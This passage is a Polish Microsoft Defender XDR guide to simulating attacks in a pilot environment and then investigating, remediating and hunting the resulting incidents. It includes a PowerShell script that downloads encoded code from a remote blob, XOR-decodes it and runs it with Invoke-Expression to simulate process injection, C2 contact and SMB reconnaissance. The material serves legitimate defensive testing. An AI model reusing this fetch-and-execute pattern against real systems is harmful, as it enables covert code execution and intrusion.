Udostępnij za pośrednictwem

Badanie i reagowanie przy użyciu Microsoft Defender XDR

  • Artykuł

Dotyczy:

  • Microsoft Defender XDR

W tym artykule opisano proces tworzenia zdarzeń za pomocą symulacji ataków i samouczków oraz używania Microsoft Defender XDR do badania i reagowania. Przed rozpoczęciem tego procesu upewnij się, że przejrzano ogólny proces pilotażu i wdrażania Microsoft Defender XDR, a niektóre składniki Microsoft Defender XDR zostały przynajmniej pilotowane.

Zdarzenie w Microsoft Defender XDR to kolekcja skorelowanych alertów i skojarzonych danych, które składają się na historię ataku. Usługi i aplikacje platformy Microsoft 365 tworzą alerty w przypadku wykrycia podejrzanego lub złośliwego zdarzenia lub działania. Poszczególne alerty dostarczają cennych wskazówek dotyczących zakończonego lub trwającego ataku. Jednak ataki zwykle stosują różne techniki względem różnych typów jednostek, takich jak urządzenia, użytkownicy i skrzynki pocztowe. Wynikiem jest wiele alertów dla wielu jednostek w dzierżawie.

Uwaga

Jeśli dopiero rozpoczynasz analizę zabezpieczeń i reagowanie na zdarzenia, zobacz przewodnik Reagowanie na pierwsze zdarzenie, aby zapoznać się z przewodnikiem po typowym procesie analizy, korygowania i przeglądu po zdarzeniu.

Kompleksowe wdrożenie dla Microsoft Defender XDR

Jest to artykuł 6 z serii 6, który ułatwia wdrażanie składników Microsoft Defender XDR, w tym badanie zdarzeń i reagowanie na nie.

Diagram przedstawiający badanie i reagowanie na zdarzenia w pilotażowym i wdrażanym procesie Microsoft Defender XDR.

Artykuły z tej serii odpowiadają następującym fazom kompleksowego wdrożenia:

Faza Link
Odp. Uruchamianie pilotażu Uruchamianie pilotażu
B. Testowanie i wdrażanie składników Microsoft Defender XDR - Pilotaż i wdrażanie usługi Defender for Identity

- Pilotaż i wdrażanie Ochrona usługi Office 365 w usłudze Defender

- Pilotaż i wdrażanie usługi Defender dla punktu końcowego

- Pilotaż i wdrażanie Microsoft Defender for Cloud Apps
C. Badanie zagrożeń i odpowiadanie na nie Badanie i reagowanie na zdarzenia praktyczne (ten artykuł)

W dowolnym momencie podczas pilotażu i wdrażania możesz przetestować możliwości reagowania Microsoft Defender XDR na zdarzenia oraz zautomatyzowanego badania i korygowania, tworząc zdarzenie z symulowanym atakiem i korzystając z portalu Microsoft Defender w celu zbadania i reagowania.

Przepływ pracy na potrzeby badania i reagowania na zdarzenia przy użyciu Microsoft Defender XDR

Oto przepływ pracy umożliwiający badanie zdarzeń i reagowanie na nie przy użyciu Microsoft Defender XDR w środowisku produkcyjnym.

Diagram przedstawiający kroki badania i reagowania na zdarzenia.

Wykonaj następujące czynności:

  1. Symulowanie ataków za pomocą portalu Microsoft Defender
  2. Określanie priorytetów zdarzeń
  3. Zarządzanie zdarzeniami
  4. Sprawdzanie zautomatyzowanego badania i reagowania za pomocą centrum akcji
  5. Korzystanie z zaawansowanego wyszukiwania zagrożeń

Krok nr 1. Symulowanie ataków za pomocą portalu Microsoft Defender

Portal Microsoft Defender ma wbudowane możliwości tworzenia symulowanych ataków na środowisko pilotażowe:

Ochrona usługi Office 365 w usłudze Defender trenowanie symulacji ataków

Ochrona usługi Office 365 w usłudze Defender z Microsoft 365 E5 lub Ochrona usługi Office 365 w usłudze Microsoft Defender plan 2 obejmuje szkolenie symulacji ataków na potrzeby ataków wyłudzających informacje. Podstawowe kroki to:

  1. Tworzenie symulacji

    Aby uzyskać instrukcje krok po kroku dotyczące tworzenia i uruchamiania nowej symulacji, zobacz Symulowanie ataku wyłudzania informacji.

  2. Tworzenie ładunku

    Aby uzyskać instrukcje krok po kroku dotyczące sposobu tworzenia ładunku do użycia w symulacji, zobacz Tworzenie niestandardowego ładunku na potrzeby trenowania symulacji ataków.

  3. Uzyskiwanie szczegółowych informacji

    Aby uzyskać instrukcje krok po kroku dotyczące uzyskiwania szczegółowych informacji za pomocą raportowania, zobacz Uzyskiwanie szczegółowych informacji poprzez trenowanie symulacji ataków.

Aby uzyskać więcej informacji, zobacz Symulacje.

Samouczki dotyczące ataków w usłudze Defender for Endpoint & symulacje

Oto symulacje usługi Defender for Endpoint firmy Microsoft:

  • Dokument porzuca tylne drzwi
  • Zautomatyzowane badanie (tylne wejście)

Istnieją dodatkowe symulacje ze źródeł innych firm. Istnieje również zestaw samouczków.

Dla każdej symulacji lub samouczka:

  1. Pobierz i przeczytaj odpowiedni podany dokument.

  2. Pobierz plik symulacji. Możesz pobrać plik lub skrypt na urządzenie testowe, ale nie jest to obowiązkowe.

  3. Uruchom plik symulacji lub skrypt na urządzeniu testowym zgodnie z instrukcjami w dokumencie przewodnika.

Aby uzyskać więcej informacji, zobacz Experience Ochrona punktu końcowego w usłudze Microsoft Defender through simulated attack (Środowisko Ochrona punktu końcowego w usłudze Microsoft Defender przez symulowany atak).

Symulowanie ataku za pomocą izolowanego kontrolera domeny i urządzenia klienckiego (opcjonalnie)

W tym opcjonalnym ćwiczeniu reagowania na zdarzenia zasymulujesz atak na izolowany kontroler domeny Active Directory Domain Services (AD DS) i urządzenie z systemem Windows przy użyciu skryptu programu PowerShell, a następnie zbadasz, skorygujesz i rozwiążesz zdarzenie.

Najpierw należy dodać punkty końcowe do środowiska pilotażowego.

Dodawanie punktów końcowych środowiska pilotażowego

Najpierw należy dodać izolowany kontroler domeny usług AD DS i urządzenie z systemem Windows do środowiska pilotażowego.

  1. Sprawdź, czy dzierżawa środowiska pilotażowego włączyła Microsoft Defender XDR.

  2. Sprawdź, czy kontroler domeny:

  3. Sprawdź, czy urządzenie testowe:

Jeśli używasz dzierżawy i grup urządzeń, utwórz dedykowaną grupę urządzeń dla urządzenia testowego i wypchnij ją na najwyższy poziom.

Jedną z alternatyw jest hostowanie kontrolera domeny usług AD DS i testowanie urządzenia jako maszyn wirtualnych w usługach infrastruktury platformy Microsoft Azure. Możesz użyć instrukcji w fazie 1 przewodnika po symulowanym laboratorium testowym przedsiębiorstwa, ale pominąć tworzenie maszyny wirtualnej APP1.

Oto wynik.

Diagram środowiska ewaluacyjnego przy użyciu symulowanego przewodnika laboratorium testowego przedsiębiorstwa.

Zasymulujesz zaawansowany atak, który wykorzystuje zaawansowane techniki, aby ukryć się przed wykryciem. Atak wylicza otwarte sesje bloku komunikatów serwera (SMB) na kontrolerach domeny i pobiera ostatnie adresy IP urządzeń użytkowników. Ta kategoria ataków zwykle nie obejmuje plików porzuconych na urządzeniu ofiary i występuje wyłącznie w pamięci. "Żyją poza ziemią" przy użyciu istniejących narzędzi systemowych i administracyjnych i wprowadzają swój kod do procesów systemowych, aby ukryć ich wykonywanie. Takie zachowanie pozwala im uniknąć wykrywania i utrwalania się na urządzeniu.

W tej symulacji nasz przykładowy scenariusz rozpoczyna się od skryptu programu PowerShell. W świecie rzeczywistym użytkownik może zostać oszukany na uruchomienie skryptu lub skrypt może zostać uruchomiony z połączenia zdalnego do innego komputera z wcześniej zainfekowanego urządzenia, co oznacza, że osoba atakująca próbuje przenieść się później w sieci. Wykrywanie tych skryptów może być trudne, ponieważ administratorzy często uruchamiają skrypty zdalnie w celu wykonywania różnych działań administracyjnych.

Zrzut ekranu przedstawiający atak programu PowerShell bez plików z iniekcją procesu i atakiem rekonesansu SMB.

Podczas symulacji atak wprowadza kod powłoki do pozornie niewinnego procesu. Scenariusz wymaga użycia notepad.exe. Wybraliśmy ten proces do symulacji, ale osoby atakujące najprawdopodobniej będą kierować długotrwały proces systemowy, taki jak svchost.exe. Następnie kod powłoki kontaktuje się z serwerem poleceń i kontroli osoby atakującej (C2), aby otrzymać instrukcje dotyczące kontynuowania. Skrypt próbuje wykonać zapytania rekonesansu względem kontrolera domeny (DC). Rekonesans umożliwia atakującemu uzyskanie informacji o ostatnich informacjach logowania użytkownika. Gdy osoby atakujące mają te informacje, mogą przenieść się później w sieci, aby przejść do określonego konta poufnego

Ważna

Aby uzyskać optymalne wyniki, postępuj zgodnie z instrukcjami symulacji ataku tak ściśle, jak to możliwe.

Uruchamianie izolowanej symulacji ataku kontrolera domeny usług AD DS

Aby uruchomić symulację scenariusza ataku:

  1. Upewnij się, że środowisko pilotażowe obejmuje izolowany kontroler domeny usług AD DS i urządzenie z systemem Windows.

  2. Zaloguj się do urządzenia testowego przy użyciu konta użytkownika testowego.

  3. Otwórz okno Windows PowerShell na urządzeniu testowym.

  4. Skopiuj następujący skrypt symulacji:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Uwaga

    Jeśli otworzysz ten artykuł w przeglądarce internetowej, mogą wystąpić problemy z kopiowaniem pełnego tekstu bez utraty określonych znaków lub wprowadzenia dodatkowych podziałów wierszy. Jeśli tak jest, pobierz ten dokument i otwórz go w programie Adobe Reader.

  5. Wklej i uruchom skopiowany skrypt w oknie programu PowerShell.

Uwaga

Jeśli używasz programu PowerShell przy użyciu protokołu pulpitu zdalnego (RDP), użyj polecenia Tekst schowka typu w kliencie RDP, ponieważ skrótu CTRL-V lub metoda kliknięcia prawym przyciskiem myszy może nie działać. Ostatnie wersje programu PowerShell czasami również nie akceptują tej metody, być może trzeba będzie najpierw skopiować do Notatnika w pamięci, skopiować ją na maszynę wirtualną, a następnie wkleić do programu PowerShell.

Kilka sekund później zostanie otwarta aplikacja Notatnik. Do Notatnika zostanie wprowadzony symulowany kod ataku. Pozostaw automatycznie wygenerowane wystąpienie Notatnika otwarte, aby korzystać z pełnego scenariusza.

Symulowany kod ataku podejmie próbę komunikacji z zewnętrznym adresem IP (symulując serwer C2), a następnie podejmie próbę rozpoznania kontrolera domeny za pośrednictwem protokołu SMB.

Ten komunikat zostanie wyświetlony w konsoli programu PowerShell po zakończeniu wykonywania tego skryptu:

ran NetSessionEnum against [DC Name] with return code result 0

Aby wyświetlić funkcję Zautomatyzowane zdarzenia i reagowanie w działaniu, pozostaw otwarty proces notepad.exe. Zobaczysz, że zautomatyzowane zdarzenia i reagowanie zatrzymują proces Notatnika.

Badanie incydentu pod kątem symulowanego ataku

Uwaga

Zanim przeprowadzimy Cię przez tę symulację, watch poniższego filmu wideo, aby zobaczyć, jak zarządzanie zdarzeniami pomaga połączyć powiązane alerty w ramach procesu badania, gdzie można je znaleźć w portalu i jak może pomóc w operacjach zabezpieczeń:

Przechodząc do punktu widzenia analityka SOC, możesz teraz rozpocząć badanie ataku w portalu Microsoft Defender.

  1. Otwórz portal Microsoft Defender.

  2. W okienku nawigacji wybierz pozycję Incydenty & Zdarzenia alertów>.

  3. Nowe zdarzenie symulowanego ataku pojawi się w kolejce zdarzeń.

    Zrzut ekranu przedstawiający przykład kolejki zdarzeń.

Badanie ataku jako pojedynczego incydentu

Microsoft Defender XDR koreluje analizę i agreguje wszystkie powiązane alerty i badania z różnych produktów w jedną jednostkę zdarzenia. W ten sposób Microsoft Defender XDR pokazuje szerszą historię ataku, umożliwiając analitykowi SOC zrozumienie złożonych zagrożeń i reagowanie na nie.

Alerty generowane podczas tej symulacji są skojarzone z tym samym zagrożeniem i w rezultacie są automatycznie agregowane jako pojedyncze zdarzenie.

Aby wyświetlić zdarzenie:

  1. Otwórz portal Microsoft Defender.

  2. W okienku nawigacji wybierz pozycję Incydenty & Zdarzenia alertów>.

  3. Wybierz najnowszy element, klikając okrąg znajdujący się po lewej stronie nazwy zdarzenia. Panel boczny wyświetla dodatkowe informacje o zdarzeniu, w tym wszystkie powiązane alerty. Każde zdarzenie ma unikatową nazwę, która opisuje go na podstawie atrybutów alertów, które zawiera.

    Alerty wyświetlane na pulpicie nawigacyjnym można filtrować na podstawie zasobów usługi: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Ochrona punktu końcowego w usłudze Microsoft Defender, Microsoft Defender XDR i Ochrona usługi Office 365 w usłudze Microsoft Defender.

  4. Wybierz pozycję Otwórz stronę zdarzenia , aby uzyskać więcej informacji o zdarzeniu.

    Na stronie Zdarzenie można wyświetlić wszystkie alerty i informacje związane ze zdarzeniem. Informacje te obejmują jednostki i zasoby, które są zaangażowane w alert, źródło wykrywania alertów (takie jak Microsoft Defender for Identity lub Ochrona punktu końcowego w usłudze Microsoft Defender) oraz przyczynę ich łączenia. Przeglądanie listy alertów o zdarzeniu pokazuje postęp ataku. W tym widoku można wyświetlić i zbadać poszczególne alerty.

    Możesz również kliknąć pozycję Zarządzaj incydentem z menu po prawej stronie, aby oznaczyć zdarzenie, przypisać je do siebie i dodać komentarze.

Przejrzyj wygenerowane alerty

Przyjrzyjmy się niektórym alertom wygenerowanym podczas symulowanego ataku.

Uwaga

Omówimy tylko kilka alertów wygenerowanych podczas symulowanego ataku. W zależności od wersji systemu Windows i produktów Microsoft Defender XDR uruchomionych na urządzeniu testowym może zostać wyświetlonych więcej alertów, które pojawią się w nieco innej kolejności.

Zrzut ekranu przedstawiający przykład wygenerowanego alertu.

Alert: Zaobserwowano wstrzyknięcie podejrzanego procesu (źródło: Ochrona punktu końcowego w usłudze Microsoft Defender)

Zaawansowani atakujący używają zaawansowanych i niewidocznych metod do utrwalania się w pamięci i ukrywania się przed narzędziami do wykrywania. Jedną z typowych technik jest działanie z poziomu procesu zaufanego systemu, a nie złośliwego pliku wykonywalnego, co utrudnia narzędziom wykrywania i operacjom zabezpieczeń wykrycie złośliwego kodu.

Aby umożliwić analitykom SOC przechwytywanie tych zaawansowanych ataków, czujniki pamięci głębokiej w Ochrona punktu końcowego w usłudze Microsoft Defender zapewniają naszej usłudze w chmurze bezprecedensowy wgląd w różne techniki wstrzykiwania kodu między procesami. Na poniższej ilustracji pokazano, jak usługa Defender dla punktu końcowego wykryła i zaalarmowała o próbie wstrzyknięcia kodu w celu notepad.exe.

Zrzut ekranu przedstawiający przykład alertu dotyczącego wstrzyknięcia potencjalnie złośliwego kodu.

Alert: Nieoczekiwane zachowanie obserwowane przez przebieg procesu bez argumentów wiersza polecenia (Źródło: Ochrona punktu końcowego w usłudze Microsoft Defender)

Ochrona punktu końcowego w usłudze Microsoft Defender wykrywanie często jest ukierunkowane na najczęstszy atrybut techniki ataku. Ta metoda zapewnia trwałość i podnosi poprzeczkę dla osób atakujących, aby przełączyć się na nowszą taktykę.

Stosujemy algorytmy uczenia na dużą skalę, aby ustalić normalne zachowanie typowych procesów w organizacji i na całym świecie oraz watch, gdy te procesy wykazują nietypowe zachowania. Te nietypowe zachowania często wskazują, że wprowadzono zbędny kod i działa on w procesie zaufanym w inny sposób.

W tym scenariuszu proces notepad.exe wykazuje nietypowe zachowanie obejmujące komunikację z lokalizacją zewnętrzną. Ten wynik jest niezależny od określonej metody używanej do wprowadzania i wykonywania złośliwego kodu.

Uwaga

Ponieważ ten alert jest oparty na modelach uczenia maszynowego, które wymagają dodatkowego przetwarzania zaplecza, wyświetlenie tego alertu w portalu może zająć trochę czasu.

Zwróć uwagę, że szczegóły alertu obejmują zewnętrzny adres IP — wskaźnik, którego można użyć jako tabeli przestawnej, aby rozwinąć badanie.

Wybierz adres IP w drzewie procesu alertu, aby wyświetlić stronę szczegółów adresu IP.

Zrzut ekranu przedstawiający przykład nieoczekiwanego zachowania przebiegu procesu bez argumentów wiersza polecenia.

Na poniższej ilustracji przedstawiono stronę szczegółów wybranego adresu IP (kliknięcie adresu IP w drzewie procesu alertu).

Zrzut ekranu przedstawiający przykład strony szczegółów adresu IP.

Alert: Rekonesans adresów IP i użytkowników (SMB) (źródło: Microsoft Defender for Identity)

Wyliczenie przy użyciu protokołu Bloku komunikatów serwera (SMB) umożliwia osobom atakującym uzyskanie ostatnich informacji logowania użytkownika, które ułatwiają im późniejsze przechodzenie przez sieć w celu uzyskania dostępu do określonego konta poufnego.

Podczas tego wykrywania alert jest wyzwalany, gdy wyliczenie sesji SMB jest uruchamiane względem kontrolera domeny.

Zrzut ekranu przedstawiający przykład alertu Microsoft Defender for Identity dla rekonesansu adresów IP i użytkownika.

Przejrzyj oś czasu urządzenia za pomocą Ochrona punktu końcowego w usłudze Microsoft Defender

Po zapoznaniu się z różnymi alertami w tym zdarzeniu przejdź z powrotem do strony zdarzenia, która została zbadana wcześniej. Wybierz kartę Urządzenia na stronie zdarzenia, aby przejrzeć urządzenia biorące udział w tym zdarzeniu zgłoszone przez Ochrona punktu końcowego w usłudze Microsoft Defender i Microsoft Defender for Identity.

Wybierz nazwę urządzenia, na którym przeprowadzono atak, aby otworzyć stronę jednostki dla danego urządzenia. Na tej stronie można zobaczyć alerty, które zostały wyzwolone i powiązane zdarzenia.

Wybierz kartę Oś czasu , aby otworzyć oś czasu urządzenia i wyświetlić wszystkie zdarzenia i zachowania obserwowane na urządzeniu w kolejności chronologicznej, przeplatane z zgłoszonymi alertami.

Zrzut ekranu przedstawiający przykład osi czasu urządzenia z zachowaniami.

Rozszerzenie niektórych bardziej interesujących zachowań zapewnia przydatne szczegóły, takie jak drzewa procesów.

Na przykład przewiń w dół do momentu znalezienia zdarzenia alertu Zaobserwowano wstrzyknięcie podejrzanego procesu. Wybierz powershell.exe wstrzyknięty w celu notepad.exe zdarzenia procesu poniżej, aby wyświetlić pełne drzewo procesów dla tego zachowania w grafie Jednostki zdarzeń w okienku bocznym. Użyj paska wyszukiwania do filtrowania w razie potrzeby.

Zrzut ekranu przedstawiający przykład drzewa procesów dla wybranego zachowania tworzenia pliku programu PowerShell.

Przejrzyj informacje o użytkowniku za pomocą Microsoft Defender for Cloud Apps

Na stronie zdarzenia wybierz kartę Użytkownicy , aby wyświetlić listę użytkowników biorących udział w ataku. Tabela zawiera dodatkowe informacje o poszczególnych użytkownikach, w tym wynik priorytetu badania każdego użytkownika.

Wybierz nazwę użytkownika, aby otworzyć stronę profilu użytkownika, na której można przeprowadzić dalsze badania. Przeczytaj więcej na temat badania ryzykownych użytkowników.

Zrzut ekranu przedstawiający przykład Defender for Cloud Apps strony użytkownika.

Zautomatyzowane badanie i korygowanie

Uwaga

Zanim przeprowadzimy Cię przez tę symulację, watch poniższego filmu wideo, aby zapoznać się z tym, czym jest zautomatyzowane samonaprawianie, gdzie można go znaleźć w portalu i jak może pomóc w operacjach zabezpieczeń:

Wróć do zdarzenia w portalu Microsoft Defender. Na karcie Badania na stronie Incydent przedstawiono zautomatyzowane badania, które zostały wyzwolone przez Microsoft Defender for Identity i Ochrona punktu końcowego w usłudze Microsoft Defender. Poniższy zrzut ekranu przedstawia tylko zautomatyzowane badanie wyzwolone przez usługę Defender dla punktu końcowego. Domyślnie usługa Defender for Endpoint automatycznie koryguje artefakty znalezione w kolejce, co wymaga korygowania.

Zrzut ekranu przedstawiający przykład zautomatyzowanych dochodzeń związanych ze zdarzeniem.

Wybierz alert, który wyzwolił badanie, aby otworzyć stronę Szczegóły badania . Zostaną wyświetlone następujące szczegóły:

  • Alerty, które wyzwoliły automatyczne badanie.
  • Dotyczy to użytkowników i urządzeń. Jeśli wskaźniki zostaną znalezione na dodatkowych urządzeniach, zostaną również wyświetlone te dodatkowe urządzenia.
  • Lista dowodów. Odnaleziono i przeanalizowano jednostki, takie jak pliki, procesy, usługi, sterowniki i adresy sieciowe. Te jednostki są analizowane pod kątem możliwych relacji z alertem i oceniane jako niegroźne lub złośliwe.
  • Znaleziono zagrożenia. Znane zagrożenia, które można znaleźć podczas badania.

Uwaga

W zależności od czasu automatyczne badanie może być nadal uruchomione. Poczekaj kilka minut na ukończenie procesu, zanim zbierzesz i przeanalizujesz dowody i przejrzyj wyniki. Odśwież stronę Szczegóły badania , aby uzyskać najnowsze wyniki.

Zrzut ekranu przedstawiający przykład strony Szczegóły badania.

Podczas zautomatyzowanego badania Ochrona punktu końcowego w usłudze Microsoft Defender zidentyfikować proces notepad.exe, który został wprowadzony jako jeden z artefaktów wymagających korygowania. Usługa Defender for Endpoint automatycznie zatrzymuje wstrzyknięcie podejrzanego procesu w ramach zautomatyzowanego korygowania.

Widać ,notepad.exe zniknąć z listy uruchomionych procesów na urządzeniu testowym.

Rozwiązywanie zdarzenia

Po zakończeniu badania i potwierdzeniu, że zostało ono skorygowane, należy rozwiązać ten problem.

Na stronie Zdarzenie wybierz pozycję Zarządzaj zdarzeniem. Ustaw stan na Rozwiązywanie zdarzenia i wybierz pozycję Prawdziwy alert dla klasyfikacji i testowania zabezpieczeń na potrzeby określania.

Zrzut ekranu przedstawiający przykład strony zdarzeń z otwartym panelem Zarządzanie incydentami, w którym można kliknąć przełącznik, aby rozwiązać problem z incydentem.

Gdy zdarzenie zostanie rozwiązane, rozpozna wszystkie skojarzone alerty w portalu Microsoft Defender i powiązanych portalach.

Spowoduje to podsumowanie symulacji ataków na potrzeby analizy incydentów, zautomatyzowanego badania i rozwiązywania zdarzeń.

Krok nr 2. Określanie priorytetów zdarzeń

Do kolejki zdarzeń można przejść z obszaru Zdarzenia & alerty > Zdarzenia przy szybkim uruchomieniu portalu Microsoft Defender. Oto przykład.

Zrzut ekranu przedstawiający sekcję Zdarzenia & alerty w portalu Microsoft Defender.

W sekcji Najnowsze zdarzenia i alerty przedstawiono wykres liczby odebranych alertów i zdarzeń utworzonych w ciągu ostatnich 24 godzin.

Aby zbadać listę zdarzeń i ustalić ich znaczenie dla przypisywania i badania, możesz:

  • Skonfiguruj dostosowywalne kolumny (wybierz pozycję Wybierz kolumny), aby zapewnić wgląd w różne cechy zdarzenia lub jednostek, których dotyczy problem. Ułatwia to podjęcie świadomej decyzji dotyczącej priorytetyzacji zdarzeń na potrzeby analizy.

  • Użyj filtrowania, aby skoncentrować się na określonym scenariuszu lub zagrożeniu. Zastosowanie filtrów w kolejce zdarzeń może pomóc w określeniu, które zdarzenia wymagają natychmiastowej uwagi.

W domyślnej kolejce zdarzeń wybierz pozycję Filtry , aby wyświetlić okienko Filtry , z którego można określić określony zestaw zdarzeń. Oto przykład.

Zrzut ekranu przedstawiający okienko Filtry sekcji Zdarzenia & alerty w portalu Microsoft Defender.

Aby uzyskać więcej informacji, zobacz Określanie priorytetów zdarzeń.

Krok nr 3. Zarządzanie zdarzeniami

Zdarzeniami można zarządzać w okienku Zarządzanie zdarzeniami dla zdarzenia. Oto przykład.

Zrzut ekranu przedstawiający okienko Zarządzanie incydentami w sekcji Zdarzenia & alerty w portalu Microsoft Defender.

To okienko można wyświetlić za pomocą linku Zarządzaj zdarzeniem na stronie:

  • Okienko właściwości zdarzenia w kolejce zdarzeń.
  • Strona podsumowania zdarzenia.

Oto sposoby zarządzania zdarzeniami:

  • Edytowanie nazwy zdarzenia

    Zmień automatycznie przypisaną nazwę na podstawie najlepszych rozwiązań zespołu ds. zabezpieczeń.

  • Dodawanie tagów zdarzeń

    Dodaj tagi używane przez zespół ds. zabezpieczeń do klasyfikowania zdarzeń, które można później filtrować.

  • Przypisywanie zdarzenia

    Przypisz ją do nazwy konta użytkownika, którą można później filtrować.

  • Rozwiązywanie zdarzenia

    Zamknij zdarzenie po jego skorygowaniu.

  • Ustawianie jego klasyfikacji i określania

    Klasyfikowanie i wybieranie typu zagrożenia podczas rozwiązywania zdarzenia.

  • Dodawanie komentarzy

    Użyj komentarzy do postępu, notatek lub innych informacji opartych na najlepszych rozwiązaniach zespołu ds. zabezpieczeń. Pełna historia komentarzy jest dostępna w opcji Komentarze i historia na stronie szczegółów zdarzenia.

Aby uzyskać więcej informacji, zobacz Zarządzanie zdarzeniami.

Krok nr 4. Sprawdzanie zautomatyzowanego badania i reagowania za pomocą centrum akcji

W zależności od tego, jak zautomatyzowane możliwości badania i reagowania są skonfigurowane dla Organizacji, akcje korygowania są wykonywane automatycznie lub tylko po zatwierdzeniu przez zespół ds. operacji zabezpieczeń. Wszystkie akcje, oczekujące lub ukończone, są wyświetlane w centrum akcji, które wyświetla listę oczekujących i zakończonych akcji korygowania dla urządzeń, wiadomości e-mail & zawartości współpracy i tożsamości w jednej lokalizacji.

Oto przykład.

Zrzut ekranu centrum unified action w portalu Microsoft Defender.

W centrum akcji możesz wybrać oczekujące akcje, a następnie zatwierdzić lub odrzucić je w okienku wysuwanego. Oto przykład.

Zrzut ekranu przedstawiający okienko z opcjami zatwierdzania lub odrzucania akcji w portalu Microsoft Defender.

Zatwierdź (lub odrzuć) oczekujące akcje tak szybko, jak to możliwe, aby zautomatyzowane badania mogły być kontynuowane i wykonywane w odpowiednim czasie.

Aby uzyskać więcej informacji, zobacz Zautomatyzowane badanie i reagowanie oraz Centrum akcji.

Krok nr 5. Korzystanie z zaawansowanego wyszukiwania zagrożeń

Uwaga

Zanim przeprowadzimy Cię przez zaawansowaną symulację wyszukiwania zagrożeń, watch poniższego filmu wideo, aby zrozumieć zaawansowane pojęcia dotyczące wyszukiwania zagrożeń, zobaczyć, gdzie można je znaleźć w portalu, i dowiedzieć się, jak może pomóc w operacjach zabezpieczeń.


Jeśli opcjonalna symulacja ataku programu PowerShell bez plików była prawdziwym atakiem, który osiągnął już etap dostępu do poświadczeń, możesz użyć zaawansowanego wyszukiwania zagrożeń w dowolnym momencie badania, aby proaktywnie wyszukiwać zdarzenia i rekordy w sieci przy użyciu tego, co już wiesz z wygenerowanych alertów i jednostek, których dotyczy problem.

Na przykład na podstawie informacji zawartych w alertie rekonesansu adresów IP (SMB) można znaleźć wszystkie zdarzenia wyliczania sesji SMB za pomocą IdentityDirectoryEvents tabeli lub znaleźć więcej działań odnajdywania w różnych innych protokołach w Microsoft Defender for Identity danych przy użyciu IdentityQueryEvents tabeli.

Wymagania dotyczące środowiska wyszukiwania zagrożeń

Do tej symulacji jest wymagana pojedyncza wewnętrzna skrzynka pocztowa i urządzenie. Do wysłania wiadomości testowej potrzebne będzie również zewnętrzne konto e-mail.

  1. Sprawdź, czy dzierżawa włączyła Microsoft Defender XDR.

  2. Zidentyfikuj docelową skrzynkę pocztową, która ma być używana do odbierania wiadomości e-mail.

    • Ta skrzynka pocztowa musi być monitorowana przez Ochrona usługi Office 365 w usłudze Microsoft Defender

    • Urządzenie z wymagania 3 musi uzyskać dostęp do tej skrzynki pocztowej

  3. Konfigurowanie urządzenia testowego:

    a. Upewnij się, że używasz Windows 10 wersji 1903 lub nowszej.

    b. Dołącz urządzenie testowe do domeny testowej.

    c. Włącz program antywirusowy Microsoft Defender. Jeśli masz problemy z włączeniem programu antywirusowego Microsoft Defender, zobacz ten temat rozwiązywania problemów.

    d. Dołącz do Ochrona punktu końcowego w usłudze Microsoft Defender.

Uruchamianie symulacji

  1. Z zewnętrznego konta e-mail wyślij wiadomość e-mail do skrzynki pocztowej zidentyfikowanej w kroku 2 sekcji wymagania dotyczące środowiska wyszukiwania zagrożeń. Dołącz załącznik, który będzie dozwolony za pośrednictwem istniejących zasad filtru poczty e-mail. Ten plik nie musi być złośliwy ani wykonywalny. Sugerowane typy plików to .pdf, .exe (jeśli jest to dozwolone) lub typ dokumentu pakietu Office, taki jak plik Word.

  2. Otwórz wysłaną wiadomość e-mail z urządzenia skonfigurowanego zgodnie z definicją w kroku 3 sekcji wymagania dotyczące środowiska wyszukiwania zagrożeń. Otwórz załącznik lub zapisz plik na urządzeniu.

Wyszukiwanie zagrożeń

  1. Otwórz portal Microsoft Defender.

  2. W okienku nawigacji wybierz pozycję Wyszukiwanie zagrożeń zaawansowanych>.

  3. Utwórz zapytanie, które rozpoczyna się od zbierania zdarzeń wiadomości e-mail.

    1. Wybierz pozycję Zapytanie > nowe.

    2. W grupach Email w obszarze Zaawansowane wyszukiwanie zagrożeń kliknij dwukrotnie pozycję EmailEvents. Powinno to zostać wyświetlone w oknie zapytania.

      EmailEvents

    3. Zmień przedział czasu zapytania na ostatnie 24 godziny. Zakładając, że wiadomość e-mail wysłana podczas uruchamiania powyższej symulacji była w ciągu ostatnich 24 godzin, w przeciwnym razie zmień przedział czasu zgodnie z potrzebami.

    4. Wybierz pozycję Uruchom zapytanie. Wyniki mogą być różne w zależności od środowiska pilotażowego.

      Uwaga

      Zobacz następny krok, aby zapoznać się z opcjami filtrowania, aby ograniczyć zwrot danych.

      Zrzut ekranu przedstawiający stronę Zaawansowane wyszukiwanie zagrożeń w portalu Microsoft Defender.

      Uwaga

      Zaawansowane wyszukiwanie zagrożeń wyświetla wyniki zapytania jako dane tabelaryczne. Możesz również wybrać wyświetlanie danych w innych typach formatów, takich jak wykresy.

    5. Przyjrzyj się wynikom i sprawdź, czy możesz zidentyfikować otwartą wiadomość e-mail. Wyświetlenie komunikatu w zaawansowanym wyszukiwaniu może potrwać do dwóch godzin. Aby zawęzić wyniki, możesz dodać warunek where do zapytania, aby wyszukać tylko wiadomości e-mail z "yahoo.com" jako adres senderMailFromDomain. Oto przykład.

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. Kliknij wynikowe wiersze z zapytania, aby sprawdzić rekord.

      Zrzut ekranu przedstawiający sekcję Inspekcja rekordu na stronie Zaawansowane wyszukiwanie zagrożeń w portalu Microsoft Defender.

  4. Po zweryfikowaniu, że widzisz wiadomość e-mail, dodaj filtr załączników. Skoncentruj się na wszystkich wiadomościach e-mail z załącznikami w środowisku. W tej symulacji skup się na przychodzących wiadomościach e-mail, a nie na tych, które są wysyłane ze środowiska. Usuń wszystkie dodane filtry, aby zlokalizować komunikat i dodać ciąg "| where AttachmentCount > 0 and EmailDirection == "Inbound""

    W poniższym zapytaniu zostanie wyświetlony wynik z krótszą listą niż początkowe zapytanie dla wszystkich zdarzeń poczty e-mail:

    EmailEvents
